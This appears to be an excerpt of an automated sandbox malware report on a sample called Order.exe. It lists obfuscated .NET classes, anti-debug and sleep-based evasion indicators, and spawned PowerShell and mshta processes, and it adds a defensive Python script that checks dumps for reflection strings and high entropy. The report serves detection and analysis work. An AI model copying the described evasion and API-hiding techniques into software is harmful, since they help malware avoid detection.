Source: 0.2.Order.exe.76b0000.4.raw.unpack, oW1mN9zbVrQALcgpAr.cs  High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'emx7IcS8P8', 'Rh37eZEl9C', 'WyP70wMKta', 'xn97K3E8Tf', 'vIJ7knNNtL', 'VKJ771I97J', 'Nic7dZVgMK'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, GsUKhkmNXVhqSn5Vh4.cs  High entropy of concatenated method names: 'Te65s2Yw3h', 'RaW5G3KBtg', 'lAp5RHYUvS', 'Mlx5xbCugD', 'HLI5eD0kdO', 'bqG50UOTNr', 'Xcu5KEIiQ7', 'rPf5kervAg', 'tj457xFgrG', 'tYq5dEsLcU'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, BvSvBD7ob3FB1JAgMd.cs  High entropy of concatenated method names: 'DWJebISlG6', 'npMeayxJ3D', 'B3uehYBS7S', 'oqseUKhYNO', 'vf6eAkHlQd', 'IoseSDNpEo', 'Q0UefCtwWa', 'mu2e27eZBC', 'UCve8ceGEy', 'PD2ePLwxmR'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, Qadts1g3OiuC6HQWNv.cs  High entropy of concatenated method names: 'rFxLHWXbrr', 'AbZLOQVWKX', 'gr5LotJikX', 'OoLLsEXkOK', 'PPvLiGkpNO', 'plXLG586te', 'nuDL3KjgGR', 'Nt0LRaf5wo', 'lYYLxQ931A', 'tYSLXnEx7l'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, yYnVrkdiwJRuEcsWluo.cs  High entropy of concatenated method names: 'jgV7HJGMHM', 'seu7O6R8RG', 'uy37oF6cZd', 'mlH7stal8j', 'Ai27ic1wT5', 'DOE7Gh31U4', 'wXa73oy4xM', 'u6u7R58XQ4', 'Wu57xAHhXA', 'w7s7XfQusH'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, e0Jj8NretasBlK1ELL.cs  High entropy of concatenated method names: 'JHCKpBnXs9', 'PBMKNW6Nvn', 'cLdkmjoiD8', 'wr0knNLePG', 'sCIKyaqojw', 'VO5KaifPc9', 'YD0KZqW9NP', 'IHKKhjFyVq', 'xTKKUmNDdg', 'qt6KEE2T3E'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, O0Iv47e57KSi8J9mms.cs  High entropy of concatenated method names: 'IfjCYKHbMB', 'w8vCQdhrus', 'RA3ClcO8yG', 'HufC5Te2ra', 'ipaCTnMcUr', 'Tq3CWmpVGe', 'bPUCLCcEow', 'CdYCuHU901', 'VaXCgWvPXV', 'lrtCBRnuGh'
Source: 0.2.Order.exe.76b0000.4.raw.unpack, XwfOjXhll0ZZ4kvBsZ.cs  High entropy of concatenated method names: 'D1Klh34gwq', 'tbXlUBqgOK', 'MkolEtsJEs', 'KeQlv7xkxW', 'GpHlqDw8nG', 'rS9lVj7YvO', 'eYSlwmptru', 'nNllpLdIMa', 'BIvlrK9YNb', 'IxZlNca0OH'
Source: 0.2.Order.exe.3a55808.1.raw.unpack, MainForm.cs  High entropy of concatenated method names: 'YgSHuitkd', 'aiP2N9Y7C', 'gHQx79i6W', 'AGv9PUWi3', 'QMsbTCblb', 'beIGikGSa', 'clTPOt4ON', 'fF0vNYCEL', 'C5TCjFvvv', 'ln3BTm5Rw'
Source: 0.2.Order.exe.3a55808.1.raw.unpack, at4ONG9F0NYCELN5Tj.cs  High entropy of concatenated method names: 'nVoxarmF975Urj2p8sJ', 'tIta6WmWAkGE6iVCWgt', 'Y8N2DklRel', 'hpreq0m6Xcu1pidWj9b', 'KFC0XvmT5N8D2LR210h', 'a5foommXYpDAHBV6LjL', 'd3wYgimbV84NAc2fo7p', 'ItvPp5mqvV1adE08UOg', 'KA7rbWmJ0EMRNxYE2Vd', 'PPtPBAmQMyT7QpfjJpI'
Source: 0.2.Order.exe.3a6a628.2.raw.unpack, MainForm.cs  High entropy of concatenated method names: 'YgSHuitkd', 'aiP2N9Y7C', 'gHQx79i6W', 'AGv9PUWi3', 'QMsbTCblb', 'beIGikGSa', 'clTPOt4ON', 'fF0vNYCEL', 'C5TCjFvvv', 'ln3BTm5Rw'
Source: 0.2.Order.exe.3a6a628.2.raw.unpack, at4ONG9F0NYCELN5Tj.cs  High entropy of concatenated method names: 'nVoxarmF975Urj2p8sJ', 'tIta6WmWAkGE6iVCWgt', 'Y8N2DklRel', 'hpreq0m6Xcu1pidWj9b', 'KFC0XvmT5N8D2LR210h', 'a5foommXYpDAHBV6LjL', 'd3wYgimbV84NAc2fo7p', 'ItvPp5mqvV1adE08UOg', 'KA7rbWmJ0EMRNxYE2Vd', 'PPtPBAmQMyT7QpfjJpI'
Source: 0.2.Order.exe.5130000.3.raw.unpack, MainForm.cs  High entropy of concatenated method names: 'YgSHuitkd', 'aiP2N9Y7C', 'gHQx79i6W', 'AGv9PUWi3', 'QMsbTCblb', 'beIGikGSa', 'clTPOt4ON', 'fF0vNYCEL', 'C5TCjFvvv', 'ln3BTm5Rw'
Source: 0.2.Order.exe.5130000.3.raw.unpack, at4ONG9F0NYCELN5Tj.cs  High entropy of concatenated method names: 'nVoxarmF975Urj2p8sJ', 'tIta6WmWAkGE6iVCWgt', 'Y8N2DklRel', 'hpreq0m6Xcu1pidWj9b', 'KFC0XvmT5N8D2LR210h', 'a5foommXYpDAHBV6LjL', 'd3wYgimbV84NAc2fo7p', 'ItvPp5mqvV1adE08UOg', 'KA7rbWmJ0EMRNxYE2Vd', 'PPtPBAmQMyT7QpfjJpI'
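Two groups of entries in this section describe the same unpacked dumps from different angles: the .Net Code lines at the top (a string literal "GetDelegateForFunctionPointer" handed to Type.GetMethod so the call never appears as a direct reference, and Assembly.Load(byte[]) to run an in-memory assembly), and the entropy lines (a .text section at 7.69 bits per byte, and classes whose method names are ten-character mixed-case strings next to the framework overrides they could not rename, such as Dispose, ToString and CanConvertFrom). The script below is an added example, not Joe Sandbox's or the sample's code, and shows how to reproduce both checks offline on a dumped region: a search for the reflection API names in the two encodings CLR metadata uses (ASCII in the #Strings heap for member and namespace names, UTF-16LE in the #US heap for string literals such as the one passed to GetMethod), and Shannon entropy over raw section bytes and over a class's concatenated method names. The dump bytes and the "plain" name list are constructed; the obfuscated names are the report's own entry for acW5SfF9YyUhqArulx.cs. The 5.0 bits/char and 7.0 bits/byte cutoffs are my assumptions, not Joe Sandbox's thresholds.

```python
"""Static triage of an unpacked .NET dump: reflection indicators and entropy.

Added example, not code from the Joe Sandbox report. SAMPLE_DUMP and PLAIN are
constructed here; OBFUSCATED is the method-name list the report shows for
acW5SfF9YyUhqArulx.cs. Cutoff values are assumptions to tune on your corpus.
"""
import math
import os
from collections import Counter

# Names worth a second look in a dump. CLR metadata stores member and namespace
# names as ASCII in #Strings; a name passed as a literal to Type.GetMethod(), as
# in the report's decompiled code, is stored UTF-16LE in the #US heap instead.
INDICATORS = ("GetDelegateForFunctionPointer", "GetMethod", "System.Reflection")


def find_indicators(dump: bytes):
    """Return (offset, indicator, encoding) for every ASCII or UTF-16LE hit."""
    hits = []
    for name in INDICATORS:
        for enc in ("ascii", "utf-16-le"):
            needle = name.encode(enc)
            pos = dump.find(needle)
            while pos != -1:
                hits.append((pos, name, enc))
                pos = dump.find(needle, pos + 1)
    return sorted(hits)


def shannon_entropy(symbols) -> float:
    """Bits per symbol of the empirical distribution; accepts bytes or str."""
    if not symbols:
        return 0.0
    n = len(symbols)
    return -sum(c / n * math.log2(c / n) for c in Counter(symbols).values())


def method_name_entropy(names) -> float:
    """The report's metric: entropy of one class's method names concatenated."""
    return shannon_entropy("".join(names))


NAME_ENTROPY_CUTOFF = 5.0      # assumed; hand-written identifiers sit well below
SECTION_ENTROPY_CUTOFF = 7.0   # assumed; packed or encrypted sections approach 8


def flag_obfuscated_classes(classes: dict) -> list:
    """classes maps class name -> method names; returns classes over the cutoff."""
    return [cls for cls, names in classes.items()
            if method_name_entropy(names) > NAME_ENTROPY_CUTOFF]


def section_looks_packed(section: bytes) -> bool:
    """True for sections like the report's .text (7.687 bits/byte)."""
    return shannon_entropy(section) > SECTION_ENTROPY_CUTOFF


# Constructed dump: #Strings-style ASCII entries, filler, then the UTF-16LE literal.
SAMPLE_DUMP = (b"\x00System.Reflection\x00Assembly\x00Load\x00GetMethod\x00"
               + b"\xAB" * 16
               + "GetDelegateForFunctionPointer".encode("utf-16-le")
               + b"\x00\x00")

# Copied from the report's entry for acW5SfF9YyUhqArulx.cs.
OBFUSCATED = ['EditValue', 'GetEditStyle', 'sOA4rCY1Yg', 'S3v4NhRn9d', 'Mx54zKQqOI',
              'OjMCmo5xHV', 'i0wCnKwmU4', 'b1sC4skFMQ', 'G6gCCP7A8j', 'vcXd3sSfiLHVpQd3sRv']
# Constructed: what a hand-written UITypeEditor subclass typically exposes.
PLAIN = ['EditValue', 'GetEditStyle', 'GetPaintValueSupported', 'PaintValue',
         'Dispose', 'ToString', 'Equals', 'GetHashCode']

if __name__ == "__main__":
    for off, name, enc in find_indicators(SAMPLE_DUMP):
        print(f"{off:#06x} {enc:10} {name}")
    print(f"obfuscated names: {method_name_entropy(OBFUSCATED):.2f} bits/char")
    print(f"plain names:      {method_name_entropy(PLAIN):.2f} bits/char")
    print("flagged:", flag_obfuscated_classes({"acW5SfF9YyUhqArulx": OBFUSCATED,
                                               "PlainEditor": PLAIN}))
    print("random 4 KiB looks packed:", section_looks_packed(os.urandom(4096)))
```

On a real dump, the interesting result is the pair: a UTF-16LE hit for GetDelegateForFunctionPointer with no ASCII hit means the P/Invoke target is resolved by name at run time, exactly the pattern the decompiled line above shows; feed the method-name lists from a decompiler (dnSpy or ILSpy export) into `flag_obfuscated_classes` to find the classes worth reading first.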

                  Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1  (4 identical events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1  (3 identical events)
Source: C:\Users\user\Desktop\Order.exe  Process information set: NOOPENFILEERRORBOX  (47 identical events)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX  (81 identical events)
Note: NOOPENFILEERRORBOX is SetErrorMode(SEM_NOOPENFILEERRORBOX), which stops the system from showing a message box when a file cannot be found and returns the error to the caller instead; the CLR and PowerShell set it routinely while loading libraries, so on its own it is a weak indicator. The BitLocker.psd1 opens above are likewise consistent with PowerShell's module auto-discovery reading every manifest under Modules\ while resolving a cmdlet, not with BitLocker being used; the SysWOW64 paths show that the 32-bit PowerShell host was spawned.
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: Order.exe PID: 6468, type: MEMORYSTR
Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\mshta.exe API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Users\user\Desktop\Order.exe Memory allocated: C10000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Order.exe Memory allocated: 2A30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Order.exe Memory allocated: 2750000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Order.exe Memory allocated: 9180000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Order.exe Memory allocated: 78A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Order.exe Memory allocated: A180000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Order.exe Memory allocated: B180000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0041AA8F rdtsc 5_2_0041AA8F
Source: C:\Users\user\Desktop\Order.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4729
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 367
Source: C:\Windows\SysWOW64\mshta.exe Window / User API: threadDelayed 2523
Source: C:\Windows\SysWOW64\mshta.exe Window / User API: threadDelayed 7450
Source: C:\Users\user\Desktop\Order.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\mshta.exe API coverage: 2.6 %
Source: C:\Users\user\Desktop\Order.exe TID: 6528 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3128 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2500 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\mshta.exe TID: 2828 Thread sleep count: 2523 > 30
Source: C:\Windows\SysWOW64\mshta.exe TID: 2828 Thread sleep time: -5046000s >= -30000s
Source: C:\Windows\SysWOW64\mshta.exe TID: 2828 Thread sleep count: 7450 > 30
Source: C:\Windows\SysWOW64\mshta.exe TID: 2828 Thread sleep time: -14900000s >= -30000s
Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe TID: 6988 Thread sleep time: -80000s >= -30000s
Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe TID: 6988 Thread sleep time: -58500s >= -30000s
Source: C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe TID: 6988 Thread sleep time: -44000s >= -30000s
Source: C:\Windows\SysWOW64\mshta.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mshta.exe Code function: 9_2_00B9C6D0 FindFirstFileW,FindNextFileW,FindClose, 9_2_00B9C6D0
Source: firefox.exe, 0000000D.00000002.2207938320.000001CE4CD4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
Source: mshta.exe, 00000009.00000002.4143600767.00000000032C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu&S
Source: mkvfHfXifKJWp.exe, 0000000C.00000002.4143576010.000000000051F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllss
Source: C:\Users\user\Desktop\Order.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Order.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\mshta.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_00417983 LdrLoadDll, 5_2_00417983
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019C019F mov eax, dword ptr fs:[00000030h] 5_2_019C019F
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0193A197 mov eax, dword ptr fs:[00000030h] 5_2_0193A197
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019FC188 mov eax, dword ptr fs:[00000030h] 5_2_019FC188
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01980185 mov eax, dword ptr fs:[00000030h] 5_2_01980185
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019E4180 mov eax, dword ptr fs:[00000030h] 5_2_019E4180
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01A161E5 mov eax, dword ptr fs:[00000030h] 5_2_01A161E5
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019BE1D0 mov eax, dword ptr fs:[00000030h] 5_2_019BE1D0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019BE1D0 mov ecx, dword ptr fs:[00000030h] 5_2_019BE1D0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01A061C3 mov eax, dword ptr fs:[00000030h] 5_2_01A061C3
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019701F8 mov eax, dword ptr fs:[00000030h] 5_2_019701F8
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019EA118 mov ecx, dword ptr fs:[00000030h] 5_2_019EA118
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019EA118 mov eax, dword ptr fs:[00000030h] 5_2_019EA118
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019EE10E mov eax, dword ptr fs:[00000030h] 5_2_019EE10E
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019EE10E mov ecx, dword ptr fs:[00000030h] 5_2_019EE10E
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01970124 mov eax, dword ptr fs:[00000030h] 5_2_01970124
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01A00115 mov eax, dword ptr fs:[00000030h] 5_2_01A00115
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01946154 mov eax, dword ptr fs:[00000030h] 5_2_01946154
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0193C156 mov eax, dword ptr fs:[00000030h] 5_2_0193C156
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019D8158 mov eax, dword ptr fs:[00000030h] 5_2_019D8158
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01A14164 mov eax, dword ptr fs:[00000030h] 5_2_01A14164
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019D4144 mov eax, dword ptr fs:[00000030h] 5_2_019D4144
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019D4144 mov ecx, dword ptr fs:[00000030h] 5_2_019D4144
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01A060B8 mov eax, dword ptr fs:[00000030h] 5_2_01A060B8
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01A060B8 mov ecx, dword ptr fs:[00000030h] 5_2_01A060B8
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0194208A mov eax, dword ptr fs:[00000030h] 5_2_0194208A
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019380A0 mov eax, dword ptr fs:[00000030h] 5_2_019380A0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019D80A8 mov eax, dword ptr fs:[00000030h] 5_2_019D80A8
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019C20DE mov eax, dword ptr fs:[00000030h] 5_2_019C20DE
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0193C0F0 mov eax, dword ptr fs:[00000030h] 5_2_0193C0F0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019820F0 mov ecx, dword ptr fs:[00000030h] 5_2_019820F0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0193A0E3 mov ecx, dword ptr fs:[00000030h] 5_2_0193A0E3
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019C60E0 mov eax, dword ptr fs:[00000030h] 5_2_019C60E0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019480E9 mov eax, dword ptr fs:[00000030h] 5_2_019480E9
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0195E016 mov eax, dword ptr fs:[00000030h] 5_2_0195E016
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019C4000 mov ecx, dword ptr fs:[00000030h] 5_2_019C4000
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019E2000 mov eax, dword ptr fs:[00000030h] 5_2_019E2000
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019D6030 mov eax, dword ptr fs:[00000030h] 5_2_019D6030
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0193A020 mov eax, dword ptr fs:[00000030h] 5_2_0193A020
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0193C020 mov eax, dword ptr fs:[00000030h] 5_2_0193C020
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01942050 mov eax, dword ptr fs:[00000030h] 5_2_01942050
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019C6050 mov eax, dword ptr fs:[00000030h] 5_2_019C6050
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0196C073 mov eax, dword ptr fs:[00000030h] 5_2_0196C073
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01938397 mov eax, dword ptr fs:[00000030h] 5_2_01938397
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0196438F mov eax, dword ptr fs:[00000030h] 5_2_0196438F
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0193E388 mov eax, dword ptr fs:[00000030h] 5_2_0193E388
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019EE3DB mov eax, dword ptr fs:[00000030h] 5_2_019EE3DB
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019EE3DB mov ecx, dword ptr fs:[00000030h] 5_2_019EE3DB
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019E43D4 mov eax, dword ptr fs:[00000030h] 5_2_019E43D4
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019FC3CD mov eax, dword ptr fs:[00000030h] 5_2_019FC3CD
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0194A3C0 mov eax, dword ptr fs:[00000030h] 5_2_0194A3C0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019483C0 mov eax, dword ptr fs:[00000030h] 5_2_019483C0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019C63C0 mov eax, dword ptr fs:[00000030h] 5_2_019C63C0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0195E3F0 mov eax, dword ptr fs:[00000030h] 5_2_0195E3F0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019763FF mov eax, dword ptr fs:[00000030h] 5_2_019763FF
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019503E9 mov eax, dword ptr fs:[00000030h] 5_2_019503E9
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0193C310 mov ecx, dword ptr fs:[00000030h] 5_2_0193C310
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01A18324 mov eax, dword ptr fs:[00000030h] 5_2_01A18324
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01A18324 mov ecx, dword ptr fs:[00000030h] 5_2_01A18324
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01960310 mov ecx, dword ptr fs:[00000030h] 5_2_01960310
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0197A30B mov eax, dword ptr fs:[00000030h] 5_2_0197A30B
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019C035C mov eax, dword ptr fs:[00000030h] 5_2_019C035C
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019C035C mov ecx, dword ptr fs:[00000030h] 5_2_019C035C
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019E8350 mov ecx, dword ptr fs:[00000030h] 5_2_019E8350
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019C2349 mov eax, dword ptr fs:[00000030h] 5_2_019C2349
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019E437C mov eax, dword ptr fs:[00000030h] 5_2_019E437C
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01A1634F mov eax, dword ptr fs:[00000030h] 5_2_01A1634F
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_01A0A352 mov eax, dword ptr fs:[00000030h] 5_2_01A0A352
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0197E284 mov eax, dword ptr fs:[00000030h] 5_2_0197E284
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019C0283 mov eax, dword ptr fs:[00000030h] 5_2_019C0283
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019502A0 mov eax, dword ptr fs:[00000030h] 5_2_019502A0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019D62A0 mov eax, dword ptr fs:[00000030h] 5_2_019D62A0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_019D62A0 mov ecx, dword ptr fs:[00000030h] 5_2_019D62A0
Source: C:\Users\user\Desktop\Order.exe Code function: 5_2_0194A2C3 mov eax, dword ptr fs:[00000030h] 5_2_0194A2C3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A2C3 mov eax, dword ptr fs:[00000030h]5_2_0194A2C3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0194A2C3 mov eax, dword ptr fs:[00000030h]5_2_0194A2C3
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019502E1 mov eax, dword ptr fs:[00000030h]5_2_019502E1
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019502E1 mov eax, dword ptr fs:[00000030h]5_2_019502E1
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_019502E1 mov eax, dword ptr fs:[00000030h]5_2_019502E1
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01A162D6 mov eax, dword ptr fs:[00000030h]5_2_01A162D6
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193823B mov eax, dword ptr fs:[00000030h]5_2_0193823B
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_0193A250 mov eax, dword ptr fs:[00000030h]5_2_0193A250
                  Source: C:\Users\user\Desktop\Order.exeCode function: 5_2_01946259 mov eax, dword ptr fs:[00000030h]5_2_01946259
